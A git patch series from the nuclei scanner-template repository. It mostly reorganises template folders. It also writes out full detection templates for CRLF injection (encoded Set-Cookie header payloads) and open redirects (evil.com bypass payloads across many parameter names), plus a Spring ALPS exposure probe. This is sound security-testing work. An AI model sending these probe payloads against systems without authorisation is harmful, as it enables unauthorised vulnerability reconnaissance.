diff --git a/exposed-files/cgi-test-page.yaml b/misconfiguration/cgi-test-page.yaml similarity index 100% rename from exposed-files/cgi-test-page.yaml rename to misconfiguration/cgi-test-page.yaml diff --git a/exposed-panels/docker-api.yaml b/misconfiguration/docker-api.yaml similarity index 100% rename from exposed-panels/docker-api.yaml rename to misconfiguration/docker-api.yaml diff --git a/exposed-files/druid-monitor.yaml b/misconfiguration/druid-monitor.yaml similarity index 100% rename from exposed-files/druid-monitor.yaml rename to misconfiguration/druid-monitor.yaml diff --git a/exposed-files/elasticsearch.yaml b/misconfiguration/elasticsearch.yaml similarity index 100% rename from exposed-files/elasticsearch.yaml rename to misconfiguration/elasticsearch.yaml diff --git a/exposed-files/exposed-kibana.yaml b/misconfiguration/exposed-kibana.yaml similarity index 100% rename from exposed-files/exposed-kibana.yaml rename to misconfiguration/exposed-kibana.yaml diff --git a/exposed-files/jkstatus-manager.yaml b/misconfiguration/jkstatus-manager.yaml similarity index 100% rename from exposed-files/jkstatus-manager.yaml rename to misconfiguration/jkstatus-manager.yaml diff --git a/exposed-panels/kubernetes-pods.yaml b/misconfiguration/kubernetes-pods.yaml similarity index 100% rename from exposed-panels/kubernetes-pods.yaml rename to misconfiguration/kubernetes-pods.yaml diff --git a/technologies/linkerd-ssrf-detect.yaml b/misconfiguration/linkerd-ssrf-detect.yaml similarity index 100% rename from technologies/linkerd-ssrf-detect.yaml rename to misconfiguration/linkerd-ssrf-detect.yaml diff --git a/exposed-files/php-errors.yaml b/misconfiguration/php-errors.yaml similarity index 100% rename from exposed-files/php-errors.yaml rename to misconfiguration/php-errors.yaml diff --git a/exposed-files/shell-history.yaml b/misconfiguration/shell-history.yaml similarity index 100% rename from exposed-files/shell-history.yaml rename to misconfiguration/shell-history.yaml 
diff --git a/exposed-files/tomcat-scripts.yaml b/misconfiguration/tomcat-scripts.yaml
similarity index 100%
rename from exposed-files/tomcat-scripts.yaml
rename to misconfiguration/tomcat-scripts.yaml
diff --git a/exposed-files/firebase-detect.yaml b/technologies/firebase-detect.yaml
similarity index 100%
rename from exposed-files/firebase-detect.yaml
rename to technologies/firebase-detect.yaml
diff --git a/exposed-files/jolokia.yaml b/technologies/jolokia.yaml
similarity index 100%
rename from exposed-files/jolokia.yaml
rename to technologies/jolokia.yaml
diff --git a/vulnerabilities/crlf-injection.yaml b/vulnerabilities/crlf-injection.yaml
index 49d001e8a9..f91bfe6ba2 100644
--- a/vulnerabilities/crlf-injection.yaml
+++ b/vulnerabilities/crlf-injection.yaml
@@ -1,25 +1,27 @@ -id: crlf-injection - -info: - name: CRLF injection - author: melbadry9 & nadino & xElkomy - severity: low - description: Improper sanitization of CRLF sequences. - -requests: - - method: GET - path: - - "{{BaseURL}}/%0D%0ASet-Cookie:crlfinjection=crlfinjection" - - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection" # unicode bypass - - "{{BaseURL}}/%0DSet-Cookie:crlfinjection=crlfinjection" - - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection" - - "{{BaseURL}}/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection" - - "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." # Apache - - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" # CVE-2016-4975 - - "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crl
finjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%
0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection" - - matchers: - - type: regex - regex: - - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' - part: header +id: open-redirect + +info: + name: Open redirect Detection + author: melbadry9 & Elmahdi & @pxmme1337 & @Regala_ & @andirrahmani1 & geeknik + severity: low + description: A user-controlled input redirect users to an external website. + +requests: + - method: GET + + path: + - "{{BaseURL}}/evil.com/" + - "{{BaseURL}}/evil.com//" + - "{{BaseURL}}///;@evil.com" + - "{{BaseURL}}///evil.com/%2F.." + - "{{BaseURL}}/////evil.com" + - "{{BaseURL}}//evil.com/%2F.." + - "{{BaseURL}}//evil.com/..;/css" + - "{{BaseURL}}/evil%E3%80%82com" + - "{{BaseURL}}/%5Cevil.com" + - "{{BaseURL}}/?Page=evil.com&_url=evil.com&callback=evil.com&checkout_url=evil.com&content=evil.com&continue=evil.com&continueTo=evil.com&counturl=evil.com&data=evil.com&dest=evil.com&dest_url=evil.com&dir=evil.com&document=evil.com&domain=evil.com&done=evil.com&download=evil.com&feed=evil.com&file=evil.com&host=evil.com&html=evil.com&http=evil.com&https=evil.com&image=evil.com&image_src=evil.com&image_url=evil.com&imageurl=evil.com&include=evil.com&langTo=evil.com&media=evil.com&navigation=evil.com&next=evil.com&open=evil.com&out=evil.com&page=evil.com&page_url=evil.com&pageurl=evil.com&path=evil.com&picture=evil.com&port=evil.com&proxy=evil.com&redir=evil.com&redirect=evil.com&redirectUri=evil.com&redirectUrl=evil.com&reference=evil.com&referrer=evil.com&req=evil.com&request=evil.com&retUrl=evil.com&return=evil.com&returnTo=evil.com&return_path=evil.com&return_to=evil.com&rurl=evil.com&show=evil.com&site=evil.com&source=evil.com&src=evil.com&target=evil.com&to=evil.com&uri=evil.com&url=evil.com&val=evil.com&validate=evil.com&view=evil.com&window=evil.com&redirect_to=evil.com" + matchers: + - type: regex + regex: + - 
'(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$' + part: header diff --git a/misconfiguration/generic-detections/top-15-xss.yaml b/vulnerabilities/generic/top-15-xss.yaml similarity index 100% rename from misconfiguration/generic-detections/top-15-xss.yaml rename to vulnerabilities/generic/top-15-xss.yaml diff --git a/exposed-panels/jenkins-asyncpeople.yaml b/vulnerabilities/jenkins/jenkins-asyncpeople.yaml similarity index 100% rename from exposed-panels/jenkins-asyncpeople.yaml rename to vulnerabilities/jenkins/jenkins-asyncpeople.yaml diff --git a/misconfiguration/jenkins-stack-trace.yaml b/vulnerabilities/jenkins/jenkins-stack-trace.yaml similarity index 100% rename from misconfiguration/jenkins-stack-trace.yaml rename to vulnerabilities/jenkins/jenkins-stack-trace.yaml diff --git a/misconfiguration/unauthenticated-jenkin-dashboard.yaml b/vulnerabilities/jenkins/unauthenticated-jenkin-dashboard.yaml similarity index 100% rename from misconfiguration/unauthenticated-jenkin-dashboard.yaml rename to vulnerabilities/jenkins/unauthenticated-jenkin-dashboard.yaml diff --git a/misconfiguration/jira-service-desk-signup.yaml b/vulnerabilities/jira/jira-service-desk-signup.yaml similarity index 100% rename from misconfiguration/jira-service-desk-signup.yaml rename to vulnerabilities/jira/jira-service-desk-signup.yaml diff --git a/misconfiguration/jira-unauthenticated-dashboards.yaml b/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml similarity index 100% rename from misconfiguration/jira-unauthenticated-dashboards.yaml rename to vulnerabilities/jira/jira-unauthenticated-dashboards.yaml diff --git a/misconfiguration/jira-unauthenticated-popular-filters.yaml b/vulnerabilities/jira/jira-unauthenticated-popular-filters.yaml similarity index 100% rename from misconfiguration/jira-unauthenticated-popular-filters.yaml rename to vulnerabilities/jira/jira-unauthenticated-popular-filters.yaml 
diff --git a/misconfiguration/jira-unauthenticated-projects.yaml b/vulnerabilities/jira/jira-unauthenticated-projects.yaml
similarity index 100%
rename from misconfiguration/jira-unauthenticated-projects.yaml
rename to vulnerabilities/jira/jira-unauthenticated-projects.yaml
diff --git a/misconfiguration/jira-unauthenticated-user-picker.yaml b/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml
similarity index 100%
rename from misconfiguration/jira-unauthenticated-user-picker.yaml
rename to vulnerabilities/jira/jira-unauthenticated-user-picker.yaml
diff --git a/vulnerabilities/moodle-filter-jmol-lfi.yaml b/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml
similarity index 100%
rename from vulnerabilities/moodle-filter-jmol-lfi.yaml
rename to vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml
diff --git a/vulnerabilities/moodle-filter-jmol-xss.yaml b/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml
similarity index 100%
rename from vulnerabilities/moodle-filter-jmol-xss.yaml
rename to vulnerabilities/moodle/moodle-filter-jmol-xss.yaml
diff --git a/vulnerabilities/open-redirect.yaml b/vulnerabilities/open-redirect.yaml
deleted file mode 100644
index f91bfe6ba2..0000000000
--- a/vulnerabilities/open-redirect.yaml
+++ /dev/null
@@ -1,27 +0,0 @@ -id: open-redirect - -info: - name: Open redirect Detection - author: melbadry9 & Elmahdi & @pxmme1337 & @Regala_ & @andirrahmani1 & geeknik - severity: low - description: A user-controlled input redirect users to an external website. - -requests: - - method: GET - - path: - - "{{BaseURL}}/evil.com/" - - "{{BaseURL}}/evil.com//" - - "{{BaseURL}}///;@evil.com" - - "{{BaseURL}}///evil.com/%2F.." - - "{{BaseURL}}/////evil.com" - - "{{BaseURL}}//evil.com/%2F.." - - "{{BaseURL}}//evil.com/..;/css" - - "{{BaseURL}}/evil%E3%80%82com" - - "{{BaseURL}}/%5Cevil.com" - - "{{BaseURL}}/?Page=evil.com&_url=evil.com&callback=evil.com&checkout_url=evil.com&content=evil.com&continue=evil.com&continueTo=evil.com&counturl=evil.com&data=evil.com&dest=evil.com&dest_url=evil.com&dir=evil.com&document=evil.com&domain=evil.com&done=evil.com&download=evil.com&feed=evil.com&file=evil.com&host=evil.com&html=evil.com&http=evil.com&https=evil.com&image=evil.com&image_src=evil.com&image_url=evil.com&imageurl=evil.com&include=evil.com&langTo=evil.com&media=evil.com&navigation=evil.com&next=evil.com&open=evil.com&out=evil.com&page=evil.com&page_url=evil.com&pageurl=evil.com&path=evil.com&picture=evil.com&port=evil.com&proxy=evil.com&redir=evil.com&redirect=evil.com&redirectUri=evil.com&redirectUrl=evil.com&reference=evil.com&referrer=evil.com&req=evil.com&request=evil.com&retUrl=evil.com&return=evil.com&returnTo=evil.com&return_path=evil.com&return_to=evil.com&rurl=evil.com&show=evil.com&site=evil.com&source=evil.com&src=evil.com&target=evil.com&to=evil.com&uri=evil.com&url=evil.com&val=evil.com&validate=evil.com&view=evil.com&window=evil.com&redirect_to=evil.com" - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$' - part: header 
diff --git a/vulnerabilities/oracle-ebs-bispgraph-file-access.yaml b/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml
similarity index 100%
rename from vulnerabilities/oracle-ebs-bispgraph-file-access.yaml
rename to vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml
diff --git a/vulnerabilities/rails6-xss.yaml b/vulnerabilities/rails/rails6-xss.yaml
similarity index 100%
rename from vulnerabilities/rails6-xss.yaml
rename to vulnerabilities/rails/rails6-xss.yaml
diff --git a/vulnerabilities/springboot-actuators-jolokia-xxe.yaml b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
similarity index 100%
rename from vulnerabilities/springboot-actuators-jolokia-xxe.yaml
rename to vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
diff --git a/vulnerabilities/springboot-h2-db-rce.yaml b/vulnerabilities/springboot/springboot-h2-db-rce.yaml
similarity index 100%
rename from vulnerabilities/springboot-h2-db-rce.yaml
rename to vulnerabilities/springboot/springboot-h2-db-rce.yaml
diff --git a/vulnerabilities/vmware-vcenter-lfi-linux.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml
similarity index 100%
rename from vulnerabilities/vmware-vcenter-lfi-linux.yaml
rename to vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml
diff --git a/vulnerabilities/vmware-vcenter-lfi.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml
similarity index 100%
rename from vulnerabilities/vmware-vcenter-lfi.yaml
rename to vulnerabilities/vmware/vmware-vcenter-lfi.yaml
diff --git a/vulnerabilities/easy-wp-smtp-listing.yaml b/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
similarity index 100%
rename from vulnerabilities/easy-wp-smtp-listing.yaml
rename to vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
diff --git a/vulnerabilities/w3c-total-cache-ssrf.yaml b/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
similarity index 100%
rename from vulnerabilities/w3c-total-cache-ssrf.yaml
rename to vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
diff --git a/misconfiguration/wordpress-accessible-wpconfig.yaml b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
similarity index 100%
rename from misconfiguration/wordpress-accessible-wpconfig.yaml
rename to vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
diff --git a/exposed-files/wordpress-db-backup.yaml b/vulnerabilities/wordpress/wordpress-db-backup.yaml
similarity index 100%
rename from exposed-files/wordpress-db-backup.yaml
rename to vulnerabilities/wordpress/wordpress-db-backup.yaml
diff --git a/exposed-files/wordpress-debug-log.yaml b/vulnerabilities/wordpress/wordpress-debug-log.yaml
similarity index 100%
rename from exposed-files/wordpress-debug-log.yaml
rename to vulnerabilities/wordpress/wordpress-debug-log.yaml
diff --git a/exposed-files/wordpress-directory-listing.yaml b/vulnerabilities/wordpress/wordpress-directory-listing.yaml
similarity index 100%
rename from exposed-files/wordpress-directory-listing.yaml
rename to vulnerabilities/wordpress/wordpress-directory-listing.yaml
diff --git a/vulnerabilities/wordpress-emails-verification-for-woocommerce.yaml b/vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml
similarity index 100%
rename from vulnerabilities/wordpress-emails-verification-for-woocommerce.yaml
rename to vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml
diff --git a/exposed-files/wordpress-emergency-script.yaml b/vulnerabilities/wordpress/wordpress-emergency-script.yaml
similarity index 100%
rename from exposed-files/wordpress-emergency-script.yaml
rename to vulnerabilities/wordpress/wordpress-emergency-script.yaml
diff --git a/exposed-files/wordpress-installer-log.yaml b/vulnerabilities/wordpress/wordpress-installer-log.yaml similarity index 100% rename from exposed-files/wordpress-installer-log.yaml rename to vulnerabilities/wordpress/wordpress-installer-log.yaml diff --git a/vulnerabilities/wordpress-social-metrics-tracker.yaml b/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml similarity index 100% rename from vulnerabilities/wordpress-social-metrics-tracker.yaml rename to vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml diff --git a/exposed-files/wordpress-tmm-db-migrate.yaml b/vulnerabilities/wordpress/wordpress-tmm-db-migrate.yaml similarity index 100% rename from exposed-files/wordpress-tmm-db-migrate.yaml rename to vulnerabilities/wordpress/wordpress-tmm-db-migrate.yaml diff --git a/exposed-files/wordpress-user-enumeration.yaml b/vulnerabilities/wordpress/wordpress-user-enumeration.yaml similarity index 100% rename from exposed-files/wordpress-user-enumeration.yaml rename to vulnerabilities/wordpress/wordpress-user-enumeration.yaml diff --git a/vulnerabilities/wordpress-wordfence-xss.yaml b/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml similarity index 100% rename from vulnerabilities/wordpress-wordfence-xss.yaml rename to vulnerabilities/wordpress/wordpress-wordfence-xss.yaml diff --git a/vulnerabilities/wordpress-wpcourses-info-disclosure.yaml b/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml similarity index 100% rename from vulnerabilities/wordpress-wpcourses-info-disclosure.yaml rename to vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml From 81c04d4e07327f8af4edb933971f03f87ca03b22 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sat, 9 Jan 2021 05:27:55 +0700 Subject: [PATCH 21/85] :hammer: Add Exposed Spring Data REST ALPS --- files/exposed-alps-spring.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 files/exposed-alps-spring.yaml 
diff --git a/files/exposed-alps-spring.yaml b/files/exposed-alps-spring.yaml new file mode 100644 index 0000000000..b187fa0a2e --- /dev/null +++ b/files/exposed-alps-spring.yaml @@ -0,0 +1,34 @@ +id: exposed-alps-spring + +info: + name: Exposed Spring Data REST Application-Level Profile Semantics (ALPS) + author: dwisiswant0 + severity: medium + + # https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/ + +requests: + - method: GET + path: + - "{{BaseURL}}/profile" + - "{{BaseURL}}/api/profile" + - "{{BaseURL}}/alps/profile" + - "{{BaseURL}}:8080/profile" + - "{{BaseURL}}:8080/api/profile" + - "{{BaseURL}}:8080/alps/profile" + matchers-condition: and + matchers: + - type: word + words: + - "_links" + - "/alps/" + - "profile" + condition: and + part: body + - type: word + words: + - "application/hal+json" + part: header + - type: status + status: + - 200 \ No newline at end of file From 0cf38debaf69280fb5f5b256c9b80caba2cfdba1 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Sat, 9 Jan 2021 17:10:12 +0530 Subject: [PATCH 22/85] Update exposed-alps-spring.yaml --- files/exposed-alps-spring.yaml | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/files/exposed-alps-spring.yaml b/files/exposed-alps-spring.yaml index b187fa0a2e..dea715883a 100644 --- a/files/exposed-alps-spring.yaml +++ b/files/exposed-alps-spring.yaml @@ -4,8 +4,7 @@ info: name: Exposed Spring Data REST Application-Level Profile Semantics (ALPS) author: dwisiswant0 severity: medium - - # https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/ + reference: https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/ requests: - method: GET 
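Review bot: The new template ends without a terminating newline, as the `\ No newline at end of file` marker after `- 200` shows; end the file with a newline so the next edit to the status matcher does not show that line as rewritten. Otherwise the detection is reasonably tight: the body must contain `_links`, `/alps/` and `profile` together, the header must carry `application/hal+json`, and the status must be 200, so a plain HTML "profile" page should not trigger it.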
@@ -13,9 +12,6 @@ requests: - "{{BaseURL}}/profile" - "{{BaseURL}}/api/profile" - "{{BaseURL}}/alps/profile" - - "{{BaseURL}}:8080/profile" - - "{{BaseURL}}:8080/api/profile" - - "{{BaseURL}}:8080/alps/profile" matchers-condition: and matchers: - type: word From 51de12683b16676bd89c12c6e869090f532862c2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 9 Jan 2021 11:41:27 +0000 Subject: [PATCH 23/85] Auto Update README [Sat Jan 9 11:41:27 UTC 2021] :robot: --- README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 6bc48cbd79..5e467fbb7d 100644 --- a/README.md +++ b/README.md @@ -15,7 +15,7 @@ An overview of the nuclei template directory including number of templates and H | Templates | Counts | Templates | Counts | | ------------------ | -------------------------------- | ------------------------- | --------------------------------------- | -| cves | 147 | files | 50 | +| cves | 147 | files | 51 | | vulnerabilities | 42 | panels | 50 | | technologies | 41 | security-misconfiguration | 29 | | workflows | 17 | tokens | 8 | @@ -213,6 +213,7 @@ An overview of the nuclei template directory including number of templates and H │   ├── elasticsearch.yaml │   ├── elmah-log-file.yaml │   ├── error-logs.yaml +│   ├── exposed-alps-spring.yaml │   ├── exposed-kibana.yaml │   ├── exposed-svn.yaml │   ├── filezilla.yaml @@ -483,7 +484,7 @@ An overview of the nuclei template directory including number of templates and H -**24 directories, 424 files**. +**24 directories, 425 files**. Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. From 187e4a5feb8f46197fdeace0db67d5780f857e32 Mon Sep 17 00:00:00 2001 
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Sat, 9 Jan 2021 18:32:04 +0530 Subject: [PATCH 24/85] moving more files around --- .../tomcat-manager-pathnormalization.yaml | 0 .../apis/swagger-api.yaml | 2 +- .../apis/wadl-api.yaml | 2 +- .../apis/wsdl-api.yaml | 2 +- .../backups/sql-dump.yaml | 0 .../backups/zip-backup-files.yaml | 0 .../configs/composer-config.yaml | 0 .../configs/exposed-svn.yaml | 0 .../configs/git-config-nginxoffbyslash.yaml | 0 .../configs/git-config.yaml | 0 .../configs}/htpasswd-detection.yaml | 0 .../configs/laravel-env.yaml | 0 .../configs/magento-config.yaml | 0 .../configs/owncloud-config.yaml | 0 .../configs/package-json.yaml | 0 .../configs/phpinfo.yaml | 0 .../configs/redmine-db-config.yaml | 0 .../configs}/server-status-localhost.yaml | 0 .../configs}/syfmony-profiler.yaml | 0 .../configs/web-config.yaml | 0 .../files}/domcfg-page.yaml | 0 .../files}/drupal-install.yaml | 0 .../files}/ds_store.yaml | 0 .../files}/filezilla.yaml | 0 .../files}/lazy-file.yaml | 0 .../files}/server-private-keys.yaml | 0 .../files}/xprober-service.yaml | 0 .../logs/elmah-log-file.yaml | 0 .../logs/error-logs.yaml | 0 .../logs}/trace-axd-detect.yaml | 0 .../aws-redirect.yaml | 8 +++--- .../docker-registry.yaml | 0 misconfiguration/larvel-debug.yaml | 2 -- .../symfony-debugmode.yaml | 0 ...takeovers.yaml => subdomain-takeover.yaml} | 0 .../graylog-api-browser.yaml | 0 .../telerik-dialoghandler-detect.yaml | 0 .../telerik-fileupload-detect.yaml | 0 vulnerabilities/generic/crlf-injection.yaml | 25 +++++++++++++++++++ .../{top-15-xss.yaml => top-xss-params.yaml} | 2 +- .../url-redirect.yaml} | 0 .../{ => ibm}/eclipse-help-system-xss.yaml | 0 .../ibm-infoprint-directory-traversal.yaml | 0 ...k-momentum-series-directory-traversal.yaml | 0 .../{ => other}/cached-aem-pages.yaml | 0 .../{ => other}/couchdb-adminparty.yaml | 0 .../{ => other}/discourse-xss.yaml | 0 .../{ => other}/mcafee-epo-rce.yaml | 0 .../{ => 
other}/microstrategy-ssrf.yaml | 0 .../{ => other}/mida-eframework-xss.yaml | 0 .../{ => other}/nginx-module-vts-xss.yaml | 0 .../{ => other}/nuuo-nvrmini2-rce.yaml | 0 .../{ => other}/pdf-signer-ssti-to-rce.yaml | 0 .../rce-shellshock-user-agent.yaml | 0 .../rce-via-java-deserialization.yaml | 0 vulnerabilities/{ => other}/rconfig-rce.yaml | 0 .../{ => other}/sick-beard-xss.yaml | 0 .../symantec-messaging-gateway.yaml | 0 .../{ => other}/tikiwiki-reflected-xss.yaml | 0 .../{ => other}/twig-php-ssti.yaml | 0 .../{ => other}/vpms-auth-bypass.yaml | 0 .../{ => other}/wems-manager-xss.yaml | 0 .../{ => other}/zms-auth-bypass.yaml | 0 .../{ => wordpress}/sassy-social-share.yaml | 0 64 files changed, 32 insertions(+), 11 deletions(-) rename {vulnerabilities => exposed-panels}/tomcat-manager-pathnormalization.yaml (100%) rename exposed-files/apis/swagger-panel.yaml => exposures/apis/swagger-api.yaml (98%) rename exposed-files/apis/wadl-files.yaml => exposures/apis/wadl-api.yaml (98%) rename exposed-files/apis/wsdl-detect.yaml => exposures/apis/wsdl-api.yaml (89%) rename {exposed-files => exposures}/backups/sql-dump.yaml (100%) rename {exposed-files => exposures}/backups/zip-backup-files.yaml (100%) rename {exposed-files => exposures}/configs/composer-config.yaml (100%) rename {exposed-files => exposures}/configs/exposed-svn.yaml (100%) rename {exposed-files => exposures}/configs/git-config-nginxoffbyslash.yaml (100%) rename {exposed-files => exposures}/configs/git-config.yaml (100%) rename {exposed-files => exposures/configs}/htpasswd-detection.yaml (100%) rename {exposed-files => exposures}/configs/laravel-env.yaml (100%) rename {exposed-files => exposures}/configs/magento-config.yaml (100%) rename {exposed-files => exposures}/configs/owncloud-config.yaml (100%) rename {exposed-files => exposures}/configs/package-json.yaml (100%) rename {exposed-files => exposures}/configs/phpinfo.yaml (100%) rename {exposed-files => exposures}/configs/redmine-db-config.yaml (100%) 
rename {exposed-files => exposures/configs}/server-status-localhost.yaml (100%) rename {exposed-files => exposures/configs}/syfmony-profiler.yaml (100%) rename {exposed-files => exposures}/configs/web-config.yaml (100%) rename {exposed-files => exposures/files}/domcfg-page.yaml (100%) rename {exposed-files => exposures/files}/drupal-install.yaml (100%) rename {exposed-files => exposures/files}/ds_store.yaml (100%) rename {exposed-files => exposures/files}/filezilla.yaml (100%) rename {exposed-files => exposures/files}/lazy-file.yaml (100%) rename {exposed-files => exposures/files}/server-private-keys.yaml (100%) rename {exposed-files => exposures/files}/xprober-service.yaml (100%) rename {exposed-files => exposures}/logs/elmah-log-file.yaml (100%) rename {exposed-files => exposures}/logs/error-logs.yaml (100%) rename {exposed-files => exposures/logs}/trace-axd-detect.yaml (100%) rename takeovers/s3-subtakeover.yaml => misconfiguration/aws-redirect.yaml (80%) rename {exposed-files => misconfiguration}/docker-registry.yaml (100%) rename {vulnerabilities => misconfiguration}/symfony-debugmode.yaml (100%) rename takeovers/{detect-all-takeovers.yaml => subdomain-takeover.yaml} (100%) rename {exposed-files => technologies}/graylog-api-browser.yaml (100%) rename {exposed-files => technologies}/telerik-dialoghandler-detect.yaml (100%) rename {exposed-files => technologies}/telerik-fileupload-detect.yaml (100%) create mode 100644 vulnerabilities/generic/crlf-injection.yaml rename vulnerabilities/generic/{top-15-xss.yaml => top-xss-params.yaml} (98%) rename vulnerabilities/{crlf-injection.yaml => generic/url-redirect.yaml} (100%) rename vulnerabilities/{ => ibm}/eclipse-help-system-xss.yaml (100%) rename vulnerabilities/{ => ibm}/ibm-infoprint-directory-traversal.yaml (100%) rename vulnerabilities/{ => other}/bullwark-momentum-series-directory-traversal.yaml (100%) rename vulnerabilities/{ => other}/cached-aem-pages.yaml (100%) rename vulnerabilities/{ => 
